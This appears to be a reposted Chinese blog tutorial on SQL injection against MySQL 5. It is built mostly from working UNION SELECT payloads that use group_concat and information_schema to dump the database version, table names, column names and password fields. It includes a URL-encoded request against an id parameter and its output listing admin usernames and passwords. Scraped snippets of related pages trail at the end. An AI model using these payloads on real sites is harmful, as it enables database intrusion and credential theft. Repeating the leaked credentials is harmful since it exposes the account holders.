對mysql5注入時,可以直接查詢information_schema中的tables表,快速找到所需的表段。同時可以利用group_concat函式,得到你想得到的東西,不用limit乙個乙個猜。
前面先轉轉別人的東西
and/**/1=2/**/union/**/select/**/1,2,group_concat(user(),0x7c7c,version(),0x7c7c,database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18―
一次暴完表名,版本,資料庫名
and/**/1=2/**/union/**/select/**/1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/**/from/**/information_schema.tables/**/where/**/table_schema=database()--
暴當前庫所有表名
一般來說如里表太多,不能一次暴完,就要加limit語句了,10個10個來
and/**/1=2/**/union/**/select/**/1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/**/(select * from information_schema.tables where table_schema=database() limit 0,10) as test --
and/**/1=2/**/union/**/select/**/1,2,group_concat(column_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/**/from/**/information_schema.columns/**/where/**/table_name=(表的hex值)--
暴表所有列
個人以為,其實如果只要找後台密碼,暴所有表名純是多餘。oracle注入是,可以快速定位pass欄位在那個表中,mysql5也是可以的。
and 1=2 union select 1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from information_schema.columns where table_schema =database() and column_name like 0x257061737325(%pass%的hex值)--
直接暴出包含有pass欄位的表名,然後再爆此表的所有列名。
id=106522%20and%201=2%20union%20select%201,2,group_concat(admin_id,0x7c7c,admin_pass),4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18 from admin--
暴出所有使用者名稱和密碼,如下:
admin||adminweb,jung||jung1979
mysql5無法注入 mysql5注入
對mysql5注入時,可以直接查詢information schema中的tables表,快速找到所需的表段。同時可以利用group concat函式,得到你想得到的東西,不用limit乙個乙個猜。前面先轉轉別人的東西 and 1 2 union select 1,2,group concat us...
mysql 5 5傳馬 mysql5 5安裝文件
groupadd mysql useradd r g mysql mysql mkdir home mysql mkdir p data mysql chown mysql mysql r data mysql yum install y gcc gcc c libtool autoconf aut...
mysql 5注入中group concat的使用
mysql中的information schema 結構用來儲存資料庫系統資訊 information schema 結構中這幾個表儲存的資訊,在注射中可以用到的幾個表。schemata 儲存資料庫名的,關鍵字段 schema name,表示資料庫名稱 tables 儲存表名的 關鍵字段 table...